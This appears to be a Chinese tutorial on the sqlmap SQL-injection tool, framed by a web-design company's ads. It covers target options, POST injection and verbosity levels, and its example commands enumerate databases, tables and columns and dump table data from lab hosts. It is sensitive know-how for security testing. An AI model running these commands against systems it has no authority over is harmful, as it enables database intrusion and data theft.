十年网站开发经验 + 多家企业客户 + 靠谱的建站团队
量身定制 + 运营维护+专业推广+无忧售后,网站问题一站解决
0x00 SQLMAP简介
创新互联专业为企业提供富县网站建设、富县做网站、富县网站设计、富县网站制作等企业网站建设、网页设计与制作、富县企业网站模板建站服务,十余年富县做网站经验,不只是建网站,更提供有价值的思路和整体网络服务。
sqlmap是一种开源的***测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常大的检测引擎、具有多种特性的***实测器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。
支持的数据库:MySQL,oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,IBM DB2,SQLite,Firebird,Sybase and SAP MaxDB
SQL注入技术:错误注入,基于时间的错误注入,报错注入,union注入
枚举数据:users,password hasher,privileges,roles,databases,tables and columns
0x01 Sqlmap扫描等级(共有7个等级,默认为1)
0、只显示python错误以及严重的信息
1、同时显示基本信息和警告信息。(默认)
2、同时显示debug信息
3、同时显示注入的payload
4、同时显示HTTP请求
5、同时显示HTTP响应头
6、同时显示HTTP响应面
0x02 获取目标方式
参数:-u 或 --url
eg:python sqlmap.py -u http(s)://targeturl[:port]/[...]
0x03 从文本中获取多个目标扫描
参数:-m
文件中保存url格式如下,sqlmap会一个一个检测
www.target1.com/vuln1.php?q=foobar www.target2.com/vuln2.asp?id=1 www.target3.com/vuln3/id/1*
0x04 从文件中加载HTTP请求
参数: -r
sqlmap可以从一个文本中获取HTTP请求,这样就可以跳过设置一些其他参数(比如cookie,POST数据,等等)。
POST /vuln.php HTTP/1.1 Host: www.target.com User-Agent: Mozilla/4.0 id=1
0x05 POST方式注入
参数: --data
此参数是吧数据以post方式提交,sqlmap会像检测GET参数一样检测POST的参数。
eg:python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"
0x06 设定超时时间
参数: --timeout
可以设定一个HTTP(S)请求超过多久判定为超时,10.5表示10.5秒,默认是30秒。
0x07 设定重试超时
参数: --retries
当HTTP(S)超时时,可以设定重新尝试连接次数,默认是3次
0x08 测试参数
*
在伪静态注入测试时,sqlmap无法直接使用测试参数,可以在想测试参数的参数后面加*
eg: 1.python sqlmap.py -u "http://targeturl/param1/value1*/param2/value2/" 2.python sqlmap.py -u "http://targeturl/param1/value1/param2/value2/15*"
0x09 列举数据库系统的数据库
参数:--dbs
当前用户有权限读取包含所有数据库列表信息的表中的时候,即可列出所有的数据库。
0x10 列举数据库表
参数: --tables -D
列举指定数据库 -D xxxx 的所有表。如果不指定-D 则列举所有数据库中的所有表。
0x11 列举书库表中的字段
参数:--columns -T -D
列举指定数库,指定表中的字段。
eg: python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users [...] Database: SQLite_masterdb Table: users [3 columns] +---------+---------+ | Column | Type | +---------+---------+ | id | INTEGER | | name | TEXT | | surname | TEXT | +---------+---------+
0x12 获取表中数据个数
参数: --count
列举指定数据库表中的数据个数。
eg: python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb [...] Database: testdb +----------------+---------+ | Table | Entries | +----------------+---------+ | dbo.users | 4 | | dbo.users_blob | 2 | +----------------+---------+
0x13 获取整个表的数据或某几个字段的数据。
--dump -D -T -C
列举某个数据库某个表的所有字段
python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users
列举某个数据库的某个表的某个字段的数据。
python sqlmap.py -u http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1 --dump -D testdb -T dbo.users -C ID,NAME